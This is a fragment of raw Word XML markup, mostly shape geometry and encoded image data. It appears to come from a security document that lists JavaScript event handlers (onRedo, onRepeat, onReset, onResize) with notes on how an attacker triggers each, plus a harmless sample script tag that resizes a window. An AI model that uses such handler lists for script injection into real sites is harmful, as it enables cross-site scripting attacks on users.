                              <a:gd name="T23" fmla="*/ 528 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 506 506"/>
                              <a:gd name="T27" fmla="*/ 506 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 506 506"/>
                              <a:gd name="T31" fmla="*/ 506 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 528 506"/>
                              <a:gd name="T35" fmla="*/ 528 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 668 506"/>
                              <a:gd name="T39" fmla="*/ 668 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 688 506"/>
                              <a:gd name="T43" fmla="*/ 688 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 689 506"/>
                              <a:gd name="T47" fmla="*/ 6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2"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="741" y="162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Text Box 92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06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onRedo()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6" o:spid="_x0000_s1506" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:25.3pt;width:37.1pt;height:9.15pt;z-index:15816704;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,506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">
                <v:shape id="Freeform 928" o:spid="_x0000_s1507" style="position:absolute;left:1930;top:506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5WnsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE3wv+w3KFvhTdNQ/SRFcRQapFKEY/4JK9&#10;JsHs3ZDdJunfu4VCH4eZOcOst6NtRE+drx1rWMwVCOLCmZpLDbfrYfYOwgdkg41j0vBDHrabycsa&#10;M+MGvlCfh1JECPsMNVQhtJmUvqjIop+7ljh6d9dZDFF2pTQdDhFuG5kotZQWa44LFba0r6h45N9W&#10;w8fp3Pjxhkd7xXTx+fVQ5/5Naf06HXcrEIHG8B/+ax+NhjRZwu+ZeATk5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eVp7EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m720,183r-699,l18,182,,162r,-4l,22,21,,720,r21,22l741,162r-18,20l720,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,689;21,689;18,688;0,668;0,664;0,528;21,506;720,506;741,528;741,668;723,688;720,689" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 927" o:spid="_x0000_s1508" type="#_x0000_t202" style="position:absolute;left:1930;top:506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zMyM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enkHf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nMzI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onRedo()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(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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change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element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>property)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>went</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>forward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undo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>transaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>history)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="13" w:line="424" w:lineRule="auto"/>
        <w:ind w:left="182" w:right="1189" w:firstLine="8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1494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12065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="922" name="Group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19"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="923" name="Freeform 925"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="19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201 19"/>
                              <a:gd name="T3" fmla="*/ 201 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 201 19"/>
                              <a:gd name="T7" fmla="*/ 201 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 201 19"/>
                              <a:gd name="T11" fmla="*/ 201 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 180 19"/>
                              <a:gd name="T15" fmla="*/ 180 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 177 19"/>
                              <a:gd name="T19" fmla="*/ 177 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 40 19"/>
                              <a:gd name="T23" fmla="*/ 40 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 19 19"/>
                              <a:gd name="T27" fmla="*/ 19 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 19 19"/>
                              <a:gd name="T31" fmla="*/ 19 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 40 19"/>
                              <a:gd name="T35" fmla="*/ 40 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 180 19"/>
                              <a:gd name="T39" fmla="*/ 180 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 201 19"/>
                              <a:gd name="T43" fmla="*/ 201 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 201 19"/>
                              <a:gd name="T47" fmla="*/ 20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Text Box 92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9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onRepeat()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3" o:spid="_x0000_s1509" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:.95pt;width:45.6pt;height:9.15pt;z-index:-17601536;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,19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">
                <v:shape id="Freeform 925" o:spid="_x0000_s1510" style="position:absolute;left:1930;top:19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XuUcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE34X+w3ILfdNNU9AaXUMpWhWEUu0HXLLX&#10;bGj2bpLdxvTvu4Lg4zAzZ5hlPtha9NT5yrGC50kCgrhwuuJSwfdpM34F4QOyxtoxKfgjD/nqYbTE&#10;TLsLf1F/DKWIEPYZKjAhNJmUvjBk0U9cQxy9s+sshii7UuoOLxFua5kmyVRarDguGGzo3VDxc/y1&#10;CtqPz4p4u07b1rvZqTgYs58PSj09Dm8LEIGGcA/f2jutYJ6+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V7lHEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,201;21,201;18,201;0,180;0,177;0,40;21,19;890,19;912,40;912,180;894,201;890,201" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 924" o:spid="_x0000_s1511" type="#_x0000_t202" style="position:absolute;left:1930;top:19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5Sv8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sJz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OUr/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onRepeat()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17728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227965</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="919" name="Group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359"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="920" name="Freeform 922"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="359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542 359"/>
                              <a:gd name="T3" fmla="*/ 542 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 542 359"/>
                              <a:gd name="T7" fmla="*/ 542 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 541 359"/>
                              <a:gd name="T11" fmla="*/ 541 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 521 359"/>
                              <a:gd name="T15" fmla="*/ 521 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 517 359"/>
                              <a:gd name="T19" fmla="*/ 517 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 381 359"/>
                              <a:gd name="T23" fmla="*/ 381 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 359 359"/>
                              <a:gd name="T27" fmla="*/ 359 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 359 359"/>
                              <a:gd name="T31" fmla="*/ 359 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 381 359"/>
                              <a:gd name="T35" fmla="*/ 381 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 521 359"/>
                              <a:gd name="T39" fmla="*/ 521 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 541 359"/>
                              <a:gd name="T43" fmla="*/ 541 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 542 359"/>
                              <a:gd name="T47" fmla="*/ 54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2"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="826" y="162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Text Box 92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59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onReset()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0" o:spid="_x0000_s1512" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:17.95pt;width:41.35pt;height:9.15pt;z-index:15817728;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,359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">
                <v:shape id="Freeform 922" o:spid="_x0000_s1513" style="position:absolute;left:1930;top:359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ZefcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZYRepG6aQzGpazAt0h68JIp4HLJj&#10;EszOhuzWpP++exA8Pt73JptMJ+40uNaygrdVBIK4srrlWsHpuH9dg3AeWWNnmRT8kYNsO59tMNV2&#10;5ILupa9FCGGXooLG+z6V0lUNGXQr2xMH7moHgz7AoZZ6wDGEm07GUfQuDbYcGhrs6bOh6lb+GgWH&#10;/KtO9udvf5HxKVneLjnqqlDqZTHtPkB4mvxT/HD/aAVJHOaHM+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ZefcMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m805,183r-784,l18,182,,162r,-4l,22,21,,805,r21,22l826,162r-17,20l805,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,542;21,542;18,541;0,521;0,517;0,381;21,359;805,359;826,381;826,521;809,541;805,542" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 921" o:spid="_x0000_s1514" type="#_x0000_t202" style="position:absolute;left:1930;top:359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nxJ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s8kY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58Sf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onReset()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>once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repetition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timeline,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>excluding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full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cycle)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(user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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>resets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form)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="266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18240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11430</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="916" name="Group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18"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="917" name="Freeform 919"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="18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200 18"/>
                              <a:gd name="T3" fmla="*/ 200 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 200 18"/>
                              <a:gd name="T7" fmla="*/ 200 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 200 18"/>
                              <a:gd name="T11" fmla="*/ 200 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 179 18"/>
                              <a:gd name="T15" fmla="*/ 179 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 176 18"/>
                              <a:gd name="T19" fmla="*/ 176 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 39 18"/>
                              <a:gd name="T23" fmla="*/ 39 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 18 18"/>
                              <a:gd name="T27" fmla="*/ 18 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 18 18"/>
                              <a:gd name="T31" fmla="*/ 18 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 39 18"/>
                              <a:gd name="T35" fmla="*/ 39 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 179 18"/>
                              <a:gd name="T39" fmla="*/ 179 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 200 18"/>
                              <a:gd name="T43" fmla="*/ 200 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 200 18"/>
                              <a:gd name="T47" fmla="*/ 20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Text Box 91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8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onResize()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7" o:spid="_x0000_s1515" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:.9pt;width:45.6pt;height:9.15pt;z-index:15818240;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,18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">
                <v:shape id="Freeform 919" o:spid="_x0000_s1516" style="position:absolute;left:1930;top:18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Ii78QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE7wu+w3KE3tWNXtQmZhUp/RMKYuIDHLLH&#10;bDB7NsluNX17t1DwcpiZb5h8M9pWXGjwjWMF81kCgrhyuuFawbF8f3oB4QOyxtYxKfglD5v15CHH&#10;TLsrH+hShFpECPsMFZgQukxKXxmy6GeuI47eyQ0WQ5RDLfWA1wi3rVwkybO02HBcMNjRq6HqXPxY&#10;Bf3HviH+fFv0vXfLsvo2ZpeOSj1Ox+0KRKAx3MP/7S+tIJ0v4e9MPA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CIu/EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,200;21,200;18,200;0,179;0,176;0,39;21,18;890,18;912,39;912,179;894,200;890,200" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 918" o:spid="_x0000_s1517" type="#_x0000_t202" style="position:absolute;left:1930;top:18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+SB8EA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgjetql7EK1GEVFYEMTaPexxbMY2&#10;2ExqE7X77zcHwePjfS9WvW3EgzpvHCsYJykI4tJpw5WCn2L3OQXhA7LGxjEp+CMPq+XgY4GZdk/O&#10;6XEKlYgh7DNUUIfQZlL6siaLPnEtceQurrMYIuwqqTt8xnDbyK80nUiLhmNDjS1taiqvp7tVsP7l&#10;fGtuh/Mxv+SmKGYp7ydXpUbDfj0HEagPb/HL/a0VzMZxbTwTj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vkgfBAAAA3A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onResize()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(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>resize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window;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>initialize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something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>like: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num="3" w:space="708" w:equalWidth="0">
            <w:col w:w="420" w:space="40"/>
            <w:col w:w="655" w:space="39"/>
            <w:col w:w="7866"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="193" w:lineRule="exact"/>
        <w:ind w:left="470"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="-3"/>
          <w:sz w:val="19"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2219960" cy="123190"/>
                <wp:effectExtent l="6350" t="0" r="2540" b="635"/>
                <wp:docPr id="913" name="Group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9960" cy="123190"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3496" cy="194"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="914" name="Freeform 916"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="7"/>
                            <a:ext cx="3439" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 3417 w 3439"/>
                              <a:gd name="T1" fmla="+- 0 190 7"/>
                              <a:gd name="T2" fmla="*/ 190 h 183"/>
                              <a:gd name="T3" fmla="*/ 21 w 3439"/>
                              <a:gd name="T4" fmla="+- 0 190 7"/>
                              <a:gd name="T5" fmla="*/ 190 h 183"/>
                              <a:gd name="T6" fmla="*/ 18 w 3439"/>
                              <a:gd name="T7" fmla="+- 0 189 7"/>
                              <a:gd name="T8" fmla="*/ 189 h 183"/>
                              <a:gd name="T9" fmla="*/ 0 w 3439"/>
                              <a:gd name="T10" fmla="+- 0 169 7"/>
                              <a:gd name="T11" fmla="*/ 169 h 183"/>
                              <a:gd name="T12" fmla="*/ 0 w 3439"/>
                              <a:gd name="T13" fmla="+- 0 165 7"/>
                              <a:gd name="T14" fmla="*/ 165 h 183"/>
                              <a:gd name="T15" fmla="*/ 0 w 3439"/>
                              <a:gd name="T16" fmla="+- 0 29 7"/>
                              <a:gd name="T17" fmla="*/ 29 h 183"/>
                              <a:gd name="T18" fmla="*/ 21 w 3439"/>
                              <a:gd name="T19" fmla="+- 0 7 7"/>
                              <a:gd name="T20" fmla="*/ 7 h 183"/>
                              <a:gd name="T21" fmla="*/ 3417 w 3439"/>
                              <a:gd name="T22" fmla="+- 0 7 7"/>
                              <a:gd name="T23" fmla="*/ 7 h 183"/>
                              <a:gd name="T24" fmla="*/ 3438 w 3439"/>
                              <a:gd name="T25" fmla="+- 0 29 7"/>
                              <a:gd name="T26" fmla="*/ 29 h 183"/>
                              <a:gd name="T27" fmla="*/ 3438 w 3439"/>
                              <a:gd name="T28" fmla="+- 0 169 7"/>
                              <a:gd name="T29" fmla="*/ 169 h 183"/>
                              <a:gd name="T30" fmla="*/ 3420 w 3439"/>
                              <a:gd name="T31" fmla="+- 0 189 7"/>
                              <a:gd name="T32" fmla="*/ 189 h 183"/>
                              <a:gd name="T33" fmla="*/ 3417 w 3439"/>
                              <a:gd name="T34" fmla="+- 0 190 7"/>
                              <a:gd name="T35" fmla="*/ 190 h 18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439" h="183">
                                <a:moveTo>
                                  <a:pt x="3417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3417" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3438" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3438" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3420" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3417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Text Box 9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496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1"/>
                                <w:ind w:left="3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&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;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14" o:spid="_x0000_s1518" style="width:174.8pt;height:9.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="3496,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">
                <v:shape id="Freeform 916" o:spid="_x0000_s1519" style="position:absolute;top:7;width:3439;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="34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dH3MUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2sCMRTE7wW/Q3iF3mrWP4hdjSJipXipdQWvz80z&#10;u3TzsiRRt9/eFAo9DjPzG2a+7GwjbuRD7VjBoJ+BIC6drtkoOBbvr1MQISJrbByTgh8KsFz0nuaY&#10;a3fnL7odohEJwiFHBVWMbS5lKCuyGPquJU7exXmLMUlvpPZ4T3DbyGGWTaTFmtNChS2tKyq/D1er&#10;YPJ5KVZ+N94WJjvFEY72083ZKPXy3K1mICJ18T/81/7QCt4GY/g9k4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90fcxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3417,183l21,183r-3,-1l,162r,-4l,22,21,,3417,r21,22l3438,162r-18,20l3417,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3417,190;21,190;18,189;0,169;0,165;0,29;21,7;3417,7;3438,29;3438,169;3420,189;3417,190" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 915" o:spid="_x0000_s1520" type="#_x0000_t202" style="position:absolute;width:3496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49mcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvelGoWJSV5GiIBSkMR56fM0+&#10;k8Xs25hdNf33bkHwOMzMN8x82dtGXKnzxrGC8SgBQVw6bbhScCg2wxkIH5A1No5JwR95WC5eBnPM&#10;tLtxTtd9qESEsM9QQR1Cm0npy5os+pFriaN3dJ3FEGVXSd3hLcJtIydJMpUWDceFGlv6rKk87S9W&#10;weqH87U5736/82NuiiJN+Gt6UurttV99gAjUh2f40d5qBen4Hf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j2Z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1"/>
                          <w:ind w:left="30"/>
                          <w:rPr>
                            <w:sz w:val="16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&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;</w:t>
                        </w:r>
